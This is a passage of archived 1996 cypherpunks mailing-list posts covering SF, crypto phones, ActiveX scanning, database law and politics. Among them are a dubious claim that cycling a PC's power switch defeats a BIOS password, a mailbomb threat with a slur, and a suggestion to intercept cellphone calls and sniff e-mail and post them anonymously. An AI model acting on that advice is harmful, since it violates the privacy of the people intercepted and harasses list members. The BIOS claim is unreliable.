From: "delious hendrixs" <hakker1@hotmail.com>
Date: Thu, 21 Nov 1996 16:52:42 -0800 (PST)
To: serw30@laf.cioe.com
Subject: Re: Magic passwodr in BIOS?
Message-ID: <19961121220729.3994.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


>From sender 
>Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id GAA17822 for
cypherpunks-outgoing; Thu, 21 Nov 1996 06:32:33 -0800 (PST)
>Received: from laf.cioe.com (root@laf.cioe.com [204.120.165.33]) by toad.com
(8.7.5/8.7.3) with ESMTP id GAA17817 for <cypherpunks@toad.com>; Thu, 21 Nov
1996 06:32:27 -0800 (PST)
>Received: from ThisHost (ewilson.roeing.com [206.230.2.100]) by laf.cioe.com
(8.7.5/8.7.3) with SMTP id JAA08462; Thu, 21 Nov 1996 09:33:14 -0500 (EST)
>Message-Id: <1.5.4.32.19961121142941.0085b630@gibson.cioe.com>
>X-Sender: serw30@gibson.cioe.com
>X-Mailer: Windows Eudora Light Version 1.5.4 (32)
>Mime-Version: 1.0
>Date: Thu, 21 Nov 1996 09:29:41 -0500
>To: Kamil Golombek <Zero@mrkev.vabo.cz>
>From: Eric Wilson <serw30@laf.cioe.com>
>Subject: Re: Magic passwodr in BIOS?
>Cc: cypherpunks@toad.com
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk
>Content-Type: multipart/mixed; boundary="--------geoboundary"
>
>
><HTML>
><BODY>
><CENTER>
><A HREF="http://www.geocities.com">Postage paid by: <IMG
SRC="http://www.geocities.com/pictures/newgeobt.gif"></A></CENTER>
></BODY>
></HTML>
>
Another way of defeating any bios system is by turning the on/off button a
whole bunch of times, causing it to reset the bios chip.  Therefore bypassing
the password logon.
Sincerely,
Psionic Damage

---------------------------------------------------------
Get Your *Web-Based* Free Email at http://www.hotmail.com
---------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 21 Nov 1996 22:32:29 -0800 (PST)
To: "tcmay@got.net>
Subject: Re: Why I Don't Read SF Much Anymore
Message-ID: <19961122063012375.AAA217@rn37.io-online.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Nov 1996 00:14:49 -0800, Timothy C. May wrote:

>On the issue of why many of us don't read as much SF as we once did...

>1. I'm a lot older. The stuff that I thought was really great back when I
>was 14-22, or so, and even "pretty good" until I was about 25 or so, now
>really looks like dreck. (Not all of it, but more than I thought was dreck
>at the time.)

>Partly this is age and life experience, partly just increased sophistication.

Remember Sturgen's (sp?) law: 90% of everything is crap -  I think most of
us just take awhile before we agree.  The SF genre could be characterized by
a couple diamonds buried in a manure pit...

>(Vernor V. claimed to a friend of mine that the day he spent talking to
>several of us was the most fruitful day he'd spent in a long time...I take
>this as evidence that folks like us are to the new generation of SF writers
>what folks like members of the British Interplanetary Society were to
>writers of past generations.)

I'd agree 100%.  A community as small as the SF writers *needs* outside
influence.  Must be neat, though, to read a book and go "I *did* that!"

>(Interestingly, Eric Drexler says he cannot enjoy it because Simmons does
>not give nanotechnology a central enough role. This echoes the point Duncan

nanotech (and other things) can spoil a good story by making things too
easy.  Take most (all?) of Forward's books - great ideas, but it reads like
a press release.

>- Orson Scott Card, "Ender's Game." A good fictional exploration of online
>anony mity. In many ways, Cypherpunks was explicity a kind of combination
>of "Ender's Game," "True Names," "The Shockwave Rider," and "Atlas
>Shrugged."

I think those books are partly responsible for getting a great many people
interested in this sort of thing...

>- and of course Heinlein, though his best stuff is 30-45 years old now

Always a mark of a great SF author: his stuff is still good even if the
science is outdated...   Ditto EE smith - it's funny, when you read things
like the lensmen series it seems cliched until you realize it *is* cliched -
because so many others copied him.

#  Chris Adams  <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>                 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 21 Nov 1996 22:39:00 -0800 (PST)
To: "Duncan Frissell" <kkirksey@appstate.campus.mci.net>
Subject: Re: Why I Don't Read SF Much Anymore
Message-ID: <19961122063647109.AAA229@rn37.io-online.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Nov 96 10:05:46 -0500, Ken Kirksey wrote:

>certain romance in the Gersnbackian view of the future that I enjoy, 
>especially in contrast to the Grim and Gritty (TM) "reality" of most 
>modern and post-modern SF.  I still find Heinlein's juveniles to be fun 
>reads, probably for this reason.  Ditto for Edgar Rice Burroughs's Mars 
>books.

That's one thing you could say: The predictors of the future are a lot more
pessimistic than they used to be...


#  Chris Adams  <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>                 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 21 Nov 1996 19:44:30 -0800 (PST)
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Mass-market crypto phones
In-Reply-To: <Pine.3.89.9611211658.A10580-0100000@netcom14>
Message-ID: <199611220340.WAA07082@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


	I'd just like to second what Lucky wrote at the end of his
very nice summation of the crypto phone hardware issues.  Eric's phones
have damn good voice quality in secure mode.

Adam
	

Lucky Green wrote:

| The alternative is to use dedicated hardware. Remember that a general
| purpose CPU is just that: general purpose. If you want to use the box only
| for one purpose, there is often a cheaper, better solution available in
| special purpose hardware. For the price of the Pentium box, you can build
| a much smaller bump-in-the-cord device that delivers great sound, over
| slow links, *and* uses strong crypto.
| 
| Which is what Eric Blossom <http://www.comsec.com/> did. And he did 
| it extremely well, I'd like to add.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 21 Nov 1996 22:47:15 -0800 (PST)
To: "m5@tivoli.com>
Subject: Re: Finjan "SurfinGate"
Message-ID: <19961122064500531.AAA48@rn37.io-online.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Nov 1996 12:10:51 -0600, Mike McNally wrote:

>Check out http://www.finjan.com and the stuff about "SurfinGate".  The
>software supposedly can perform an on-the-fly inspection of a Java 
>applet or ActiveX control, and then apply a signature to it along with
>a "safety" level qualifier to feed into a configurable policy mechanism.
>
>Any ideas as to how you can look at an ActiveX control and determine
>whether it's safe or not?

You can't.  Anyone who claims to be able to do so is betting their scanning
ability against the collective programming skill of hundreds of
brilliant-but-twisted programmers/hackers.   Remember CHK4BOMB? The old DOS
program that would dump strings from an EXE so you could look for things
like "Happy birthday yoshi"?  They started encrypting and adding
polymorphing and stealthing and . . .

Now you could write a program that would scan for more 'obvious' attacks but
it will probably be a continual catch-up game.  You don't even have the
ability to do checksumming of existing files (like you do w/virii).

#  Chris Adams  <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>                 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 21 Nov 1996 20:10:50 -0800 (PST)
To: m5@tivoli.com
Subject: Re: Finjan "SurfinGate"
In-Reply-To: <3294C256.6B88@tivoli.com>
Message-ID: <199611220406.XAA07196@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally wrote:

| Seems to me that putting together an ActiveX control that "sneaks" its
| way through the firewall risk policy wouldn't be hard.  Unless the 
| applet scanner actually simulates execution of the control under a
| variety of input conditions (and we know that's not likely) (but prove
| me wrong, please) there's not much it can do other than poke around and
| check what other DLL's the thing wants to access.  It might be a bit
| harder to be sneaky in Java, but I certainly wouldn't bet I could look
| at an applet and guarantee its safety to any threshold (if I could, why
| not just do that in the browser?).

	Browsers are big, complex bits of technology.  If you built an
applet verifier that ran on a firewall, it could be substantially
smaller than the 6mb of Netscape3.0 (SunOS).  Smaller code is easier
to verify, and less likely to contain bugs.  In addition, you could be
more confident that your policy goals are met in controlling what
applets enter the perimiter that the firewall deliniates.

	Deploying new browsers to every desktop can be challenging.
If you have a java-gw, there is a lesser need for new browsers
everywhere in response to bugs.  Also, you may be able to get the
source to a verifier, but not to the browser.

	Doing a good job in real time would be very tough.  We need
signed capacity requirements, and an organization that will stand by
its certifications of security.  I have at least one client who would
pay for certified ok applets.  (Not certified origin, certified
non-malicious, for various values of non-malicious).

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Thu, 21 Nov 1996 23:36:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: re: sci fi
Message-ID: <3.0.32.19961121233535.0106ea44@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:50 PM 11/21/96 -0800, John Anonymous MacDonald wrote:
>Without a doubt contemporary SciFi authors such as Vinge and Stephenson
have produced
>great thought provoking works. Always a good read. 
>
>But sometimes I'm drawn back to the rollicking rampages of EE Doc Smith or
the playful
>frollicks of Harry Harrison. While not presenting a plausible vision of
our future
>they do offer a significant amount of enjoyment. Pure brain candy!

For absolute brain candy, I recommend "Star Smashers of the Galaxy
Rangers".  EE.Doc Smith meets the Hardy Boys.  The ending I had to read
twice...

>So will some exceptionally creative sort spend 3 or 4 hundred pages exploring
>BlackNet and the future of global networking? 

We can only hope.

>Or has anyone looked at what has happened to trivial networks like 
>IRC's EFnet to see a potential model for how global networking will become 
>balkanized under bandwidth constraints, server cycle shortages,
>and over worked sysadmins? One physical connection and many virtual,
>private networks with limitted interoperability and crossover. The
internet of
>the near future may not be the open paradise it is today.

The bandwidth will increase and people will find bigger and better ways to
chew it up.  Governments will make bigger and bigger claims to why their
set of petty rule outweigh other governemnts petty rules, increasing fear,
uncertanty and doubt in the process.  All in all, things will change and
life will go on.  (Unless we all die and then all bets are off.)

>I read in InfoWorld that the Telco Dereg act may destroy the local loop
market
>for T1 lines from LD COs. As many as 900,000 new T1's may become available
at bargain
>rates on the order of $40 per month with end point hardware under $700.
Watch 
>PairGain Technologies as they are the leader in this hardware market and have
>some real interesting vox/data over twisted pair toys.

Mmmm!  Bandwidth!

I hear of people complaining how much time is spent online.  This is going
to be a heroin-like fix to those sort of people.  (I already have access to
a t-1.  It can be pretty damn addicting.  At least when the rest of the net
is willing to cooperate...)  I expect that the big winners in the bandwidth
wars will be the hard drive manufacturers.  Imagine the amount of crap that
will accumulate when downloads take seconds instead on minutes (or hours).
Buy your stock now!

>Sheesh, I start out talking SciFi and end up talking PairGain! I guess the
future
>is now.

Actually the future was last week.  Sorry.  You missed it.

---
|              "Remember: You can't have BSDM without BSD."              |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 21 Nov 1996 23:33:54 -0800 (PST)
To: "Richard L. Field" <field@pipeline.com>
Subject: Re: Database law... silver lining??
Message-ID: <3.0b28.32.19961121234708.00728b70@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:44 AM 11/22/96 GMT, you wrote:
>Real-To:  "Richard L. Field" <field@pipeline.com>
>
>  Should a database protection law such as HT 3531 be enacted in the U.S.,
>it just may turn out to be the best weapon yet for the protection of
>personal data.  Why shouldn't a "database" be interpreted to include an
>individual's personal data?  All that is required is that it be "arranged in
>a systematic or methodical way".  Heck, that's not so hard.  And a "database
>maker" isn't necessarily Lexis (the compiler of P-TRAK) and friends, it is
>each individual who originally made a "substantive" (i.e., lifetime)
>investment in the collection of the contents of his personal database.

Cute, but any such proposal is almost guaranteed to allow for independent
creation from a non-database source - e.g., warranty cards, info extracted
from you when you ask for credit, public records, etc. For example, one
comment to Article 3 of the proposed WIPO treaty on sui generis protection
of databases provides:

"3.02 The protection provided does not preclude any person from
independently collecting, assembling or compiling works, data or materials
from any source other than a protected database."

(see <http://www.loc.gov/copyright/wipo6.html> for more.)

It's very unlikely that Congress (or the PTO) intends to do anything
that'll screw up what's already working well for big database publishers.
Your theory is similar to a patent flavor for databases, while the
proposals floated out so far are much more like copyright - e.g.,
independent creation is OK, but copying is not, even with wide public
distribution, and long protection times. With patent, independent creation
is not OK, copying (the information, not the device) is encouraged/allowed,
and protection time is short.

[Friday, 11/22, is the deadline to submit comments to the PTO asking them
to withdraw consideration of the WIPO database treaty from the conference
in Geneva. (Or encouraging them to submit it, if that's your opinion.)
Comments can be sent to Mr. 
Keith Kupferschmid at diploconf@uspto.gov.)

--
Greg Broiles                | US crypto export control policy in a nutshell:
gbroiles@netbox.com         | 
http://www.io.com/~gbroiles | Export jobs, not crypto.
                            | 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Boursy <boursy@earthlink.net>
Date: Thu, 21 Nov 1996 21:17:17 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: wealth and property rights
In-Reply-To: <199611220235.SAA02028@kachina.jetcafe.org>
Message-ID: <3295382A.23E1@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Dave Hayes wrote:
> 
>> Btw, people of your mentality (communists/socialists) already make it
>> very difficult for me to accumulate, due to the exhorbitant tax rates
>> to support those who chose to blow their money as soon as they have
>> it
> 
> I don't necessarily want to support "socialism" nor "capitalism". Both
> are extremes of a situation which does no one any good to exist.
> 
> However, I would question the implication that "socialists" are
> responsible for the higher tax rates you currently experience.

  Well labels--'socialist', 'communist', etc. can be quite misleading'
as they mean many different things to different people but they do
push emotional hot buttons.

  I don't understand the 'exhorbitant taxes' thing--in the US our
taxes are absurdly low compared with most of western Europe and
our social services a disgrace.  I don't know what it's like in
the UK but compared with the rest of Western Europe our tax rate
is a joke designed for the upper classes.

				Steve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Boursy <boursy@earthlink.net>
Date: Thu, 21 Nov 1996 21:48:54 -0800 (PST)
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: wealth and property rights
In-Reply-To: <199611191237.MAA00639@server.test.net>
Message-ID: <32953F9F.13E6@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Adam Back wrote:
> 
> Steve Boursy writes:
>
>>   That's a fair question.  I don't begrude one's ownership of their
>> fair share--but I do have serious problems with what we shall
>> call 'accumulators' if you will.  For them I have contempt and no--
>> they do not have that right of possession and often such 'work' is
>> at the expense and on the backs of others.
> 
> I'm an accululator :-)
> 
> The investments I have I worked for.  

  Well of course you have--but the majority of people
in the world that are poor have worked just as hard
and do not derive the same benefits--that needs to
be changed.

  <clip>

> See, if you spend your money now, on the above, you have no right to
> criticize me when I look relatively wealthy later.  It's your choice
> to blow your money.


  I agree--that's not what I was talking about--the majority of wealth
is handed down not earned--and the ability to earn also more often
than not results in hand me down priv.

 
> Btw, people of your mentality (communists/socialists) already make it
> very difficult for me to accumulate, 

  We do our best--some day we'll take it all away--really.

                             Steve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hack Watch News <kooltek@iol.ie>
Date: Thu, 21 Nov 1996 17:32:12 -0800 (PST)
To: Asgaard <asgaard@Cor.sos.sll.se>
Subject: Re: Anderson & Kuhn's "Improved DFA" paper
In-Reply-To: <Pine.HPP.3.91.961121190800.2140A-100000@cor.sos.sll.se>
Message-ID: <3295023B.266E@iol.ie>
MIME-Version: 1.0
Content-Type: text/plain


Asgaard wrote:
> 
> On Thu, 21 Nov 1996 stewarts@ix.netcom.com wrote:
> 
> > Anderson&Kuhn just announced the latest in a series of attacks on
> > "tamperproof" hardware crypto modules by Israeli, UK, and US cryptographers.
> 
> You forgot the Belgians (or is Jean-Jacques Quisquater French?).

Markus Kuhn is German :-)

Regards...jmcc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 22 Nov 1996 00:52:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: sci fi
In-Reply-To: <199611220550.VAA01019@abraham.cs.berkeley.edu>
Message-ID: <199611220909.DAA00294@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> diGriz
> 
     As in Slippery Jim?

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Three Blind Mice <3bmice@nym.alias.net>
Date: Fri, 22 Nov 1996 00:35:40 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: /dev/random and similar
Message-ID: <199611220835.DAA28760@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


There was a thread here a while back about /dev/random and similar devices
for Linux, but I managed to lose the mails and the hks.net archives still
aren't working (any news on that?).  If someone could tell me where I
could find such a driver, I would appreciate it very much.      TIA!

--3bmice





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard L. Field" <field@pipeline.com>
Date: Thu, 21 Nov 1996 20:44:44 -0800 (PST)
To: cyberia-l@listserv.aol.com
Subject: Database law... silver lining??
Message-ID: <1.5.4.16.19961121234609.222f2c24@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


  Should a database protection law such as HT 3531 be enacted in the U.S.,
it just may turn out to be the best weapon yet for the protection of
personal data.  Why shouldn't a "database" be interpreted to include an
individual's personal data?  All that is required is that it be "arranged in
a systematic or methodical way".  Heck, that's not so hard.  And a "database
maker" isn't necessarily Lexis (the compiler of P-TRAK) and friends, it is
each individual who originally made a "substantive" (i.e., lifetime)
investment in the collection of the contents of his personal database.

  Based on this reasoning, P-TRAK, etc. would be considered an infringing
use, subject to civil and possible criminal actions, injunctions,
impoundment, and monetary relief.  Hmmm...

   - Richard Field





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Fri, 22 Nov 1996 04:34:36 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Word List
In-Reply-To: <FsZRXD42w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.95.961122072725.9778F-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> Date: Thu, 21 Nov 96 22:34:38 EST
> From: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
> Reply-To: freedom-knights@jetcafe.org
> To: freedom-knights@jetcafe.org
> Subject: Re: Word List
> 
> >From coderpunks-errors@toad.com  Thu Nov 21 21:47:48 1996
> Received: by bwalk.dm.com (1.65/waf)
> 	via UUCP; Thu, 21 Nov 96 22:21:56 EST
> 	for dlv
> Received: from toad.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
>         id AA29836 for cypherpunks; Thu, 21 Nov 96 21:47:48 -0500
> Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id RAA03669 for coderpunks-outgoing; Thu, 21 Nov 1996 17:24:43 -0800 (PST)
> Received: from Eden.mindport.net (eden.mindport.net [205.219.167.4]) by toad.com (8.7.5/8.7.3) with SMTP id RAA03664 for <coderpunks@toad.com>; Thu, 21 Nov 1996 17:24:39 -0800 (PST)
> Received: from polaris (polaris.mindport.net [205.219.167.2]) by Eden.mindport.net (8.6.12/8.6.12) with SMTP id UAA29275; Thu, 21 Nov 1996 20:21:36 -0500
> Posted-Date: Thu, 21 Nov 1996 20:21:36 -0500
> Date: Thu, 21 Nov 1996 20:23:17 -0500 (EST)
> From: Black Unicorn <unicorn@schloss.li>
> X-Sender: unicorn@polaris
> To: Johnny Waters - Staff <waters@posh.internext.com>
> Cc: coderpunks@toad.com, jimg@mentat.com
> Subject: Re: Word List
> In-Reply-To: <199611212150.QAA16115@posh.internext.com>
> Message-Id: <Pine.SUN.3.94.961121202302.21331A-100000@polaris>
> Mime-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> Sender: owner-coderpunks@toad.com
> Precedence: bulk
> 
> On Thu, 21 Nov 1996, Johnny Waters - Staff wrote:
> 
> > Date: Thu, 21 Nov 1996 16:50:24 -0500 (EST)
> > From: Johnny Waters - Staff <waters@posh.internext.com>
> > To: coderpunks@toad.com, jimg@mentat.com
> > Subject: Re: Word List
> > 
> > I have a great 190 meg list I could post to the list (har har)
> > johnny
> 
> Post it to the "freedom-knights" list instead.
> 

If you do that, the cypherpunks mailing list will
be ELIMINATED!   I have about 6 different addresses
to mailbomb from, and about a dozen men to mailbomb with.

> --
> Forward complaints to : European Association of Envelope Manufactures
> Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
> Vote Monarchist         Switzerland
> 

The cypherpunks are faggot PUNKS!
The Freedom Knights are REAL MEN.

go ahead, try and send a 190 meg mailbomb to the F-K list.  It will be
the last you will ever see of cypherpunks.

That is your last warning, you fucking PUNK!
(a PUNK is a wimp with NO BALLS!)

-aga





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 22 Nov 1996 06:14:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The public sees no need for crypto at this time
In-Reply-To: <v03007800aeba463ea301@[207.167.93.63]>
Message-ID: <qRPsXD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy may decided to rant about crypto for a change. As always he exposes his
complete lack of knowledge.

"Timothy C. May" <tcmay@got.net> writes:

> * Most people don't think they're targets of wiretapping. They don't think
> the FBI is tapping their phones, and they've never even heard of the NSA,
> let alone GCHQ, NRO, SDECE, etc.
>
> * "What have I got to hide?"

So, demonstrate. Pick up conversations on cellular phones, transcribe
the embarassing ones, post them to Usenet via anonymous remailers.

Sniff the e-mail passing through your site and post it anonymously.

That'll make the news and make people aware that they need privacy.

> (I like to cite the evolution of metal safes. Mosler Safe Company says the
> driving force behind safe design, and deployment to merchants and banks,
> was the _insurance business_. Instead of preaching about the value of
> increased security, the insurers--who knew how to take the long
> view--offered rate discounts if stronger safes were installed. Voila,
> stronger safes. Until similar incentives exist for data--e.g., insurance
> for loss of patient records, confidential dossiers, etc.--I doubt most
> people will listen to the "preaching.")

The pressure from insurers might work in strange ways. E.g. in many
locales the law mandates 10% off car theft insurance premiums for cars
that have certain kinds of alarms. According to most authorities the
alarms are totally useless, but almost all cars in NYC have them, and
they go off in the middle of the night when someone walks by the car -
truly stupid.

Similarly the companies that insure doctors for against malpractice
suits might say one day that all patient records in a computer must be
adequately encrypted in the case PC gets stolen - or they might mandate
that nothing is encrypted w/o some sort of GAK escrow. And this won't
even be gubmint-mandated.

> * Look at how few people--myself included--routinely use crypto (digital
> signatures, etc.)

It's because you're an idiot.

> P.S. I'll be away at the Hackers Conference in Santa Rosa, CA for the next
> several days, and then travelling for the American holiday of Thanksgiving
> Day. So, I'll be mostly away from the list for a while.

That's good.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paratama@idola.net.id
Date: Thu, 21 Nov 1996 17:57:32 -0800 (PST)
To: cypherpunks@toad.com')
Subject: Re: FW: RE: FW: Viel Glueck!
Message-ID: <9611220201.AA05596@merak.idola.net.id>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 PM 11/21/96 +0100, you wrote:
>> GOOD LUCK TOTEM
>>
>>                                             \\\|||///
>>                                             =========
>>                                         ^   | O   O |
>>                                        / \   \ _v_'/
>>                                         #     _| |_
>>                                        (#) //(     )
>>                                         #\//  |* *|\\
>>                                         #\/  (  *  )/
>>                                         #     =====
>>                                         #     (\|/)
>>                                         #     || ||
>>                                         # .---'| |---.
>>                                         # '---'  ----'
>>
>>
>> This totem has been sent to you for good luck.
>>
>> It has been sent around the world nine times so far.  You will receive
>> good luck within four days of relaying this totem.  Send copies to people
>> you think need good luck. Don't send money as fate has no price. Do not
>> keep this message.  The totem must leave your hands in 96 hours. Send ten
>copies
>> and see what happens in four days.  You will get a surprise.  This is
>> true, even if you are not superstitious.
>>
>> Good luck, but please remember: 10 copies of this message must leave
>> your hands in 96 hours...
>>
>> You must not sign on this message...
>
>
>
>
>
>
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 22 Nov 1996 06:38:19 -0800 (PST)
To: clay.olbon@dynetics.com
Subject: RE: Mass-market crypto phones
Message-ID: <199611221438.GAA12285@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


 "Clay Olbon" writes:
> If I'm not mistaken (and I've been known to be from time to time :-), cell
> phones are already encrypted between the phone and cell tower.

He's mistaken, at least for analog cellphones in the US - digital
cellphones (just starting to come in now) may have some form
of protection.

Before a law was passed, it was easy and legal to listen in on
cellphones on most scanners and many ham radio outfits (and
even some UHF TVs). Now it's merely easy.

It's kind of pathetic - I'm sure that the billions lost to cellular fraud 
far outweigh the value of crimes that the  LEA groups have been 
able  prevent by preserving their ability to illegally eavesdrop on 
cell calls without a warrant.

Peter Trei
trei@process.com
(standard disclaimer applies)

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay Olbon II <olbon@ix.netcom.com>
Date: Fri, 22 Nov 1996 07:06:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Mass-market crypto phones
Message-ID: <1.5.4.32.19961122150532.006d0fe0@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:41 AM 11/22/96 -6, Peter Trei wrote (in part):
>It's kind of pathetic - I'm sure that the billions lost to cellular fraud 
>far outweigh the value of crimes that the  LEA groups have been 
>able  prevent by preserving their ability to illegally eavesdrop on 
>cell calls without a warrant.

Lots of TV specials lately on stealing cell-phone codes and cloning phones.
Seems to me that this would be ridiculously easy to stop using crypto.  

As a side issue (related to your comment about banning the listening in on
cell-phone calls).  I find it pretty amazing that it is possible to make it
illegal to listen to signals broadcast over public airways.  Yet another way
crypto will help society - it will make such laws restricting our freedoms
obsolete.

        Clay

>Peter Trei
>trei@process.com
>(standard disclaimer applies)
>
>Peter Trei
>Senior Software Engineer
>Purveyor Development Team                                
>Process Software Corporation
>http://www.process.com
>trei@process.com


*******************************************************
Clay Olbon			    olbon@ix.netcom.com
engineer, programmer, statistitian, etc.
**********************************************tanstaafl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Anderson <ota+@transarc.com>
Date: Fri, 22 Nov 1996 07:18:01 -0800 (PST)
To: iang@systemics.com>
Subject: Re: Crypto Bounties
In-Reply-To: <199611190406.XAA26146@alpha.pair.com>
Message-ID: <cmZQDm6SMV0=1kqk40@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Regarding the idea of setting up markets (or bounties) for software, I'd
like to direct your attention to the Idea Futures scheme.  This is
currently embodied as a web server at:
    http://www.ideosphere.com/ideosphere/fx/main.html

There is some background on the idea by Robin Hanson who talks
extensively about using it as a funding mechanism.  In addition there is
a whole suit of market claims denominated in fake money.

Ted Anderson

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMpXDrgGojC9e/wyBAQGPmgP/fXo4g3w9yefWiQK+Lp2RRxpwjwmmTmr3
b75k0deXV5gX/WdcNccvdFEYcZ5MMTEMQYOeFxhPi0Xr5goIJLJ++oPCRGXAWADQ
k98PDgzfM+si8QqT8K7PG+BwejankJsh1npqaJVCE/8dboZBKNFVlsrzg7oGTfw2
adgiDyWD7Og=
=pbS3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Fri, 22 Nov 1996 10:37:53 -0800 (PST)
To: Asgaard <asgaard@Cor.sos.sll.se>
Subject: re: sci fi
Message-ID: <3.0.32.19961122103636.01017d20@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:48 PM 11/22/96 +0100, Asgaard wrote:
>On Thu, 21 Nov 1996, Alan Olsen wrote:
>
>> For absolute brain candy, I recommend "Star Smashers of the Galaxy
>> Rangers".  EE.Doc Smith meets the Hardy Boys.  The ending I had to read
>> twice...
>
>A rather odd book that I found immensely stimulating is
>'Venus on a halfshell' by a Nym (allegedly for Kurt Vonnegut,
>who in most of his books under his own name now and then
>refers to some hilarious non-existing SF story by this 'author').

Philip Jose Farmer claimed to have written that one.

It also brings up an interesting point...

Nyms are fairly commonplace amongst the writing community.  (Even Steven
King wrote under a nym (or two).)  In fact there are books listing "nyms of
the famous" for book collectors.  Payment schemes for authors under nyms
are already in place.  (For example, I do a monthly column under a nym and
they have no qualms about paying me.)  DBAs also cover nyms in some respects.

Nyms do not have to have a "sinister purpose" (as the feds would like us to
believe).  I think that they are far more ingraned into the culture than
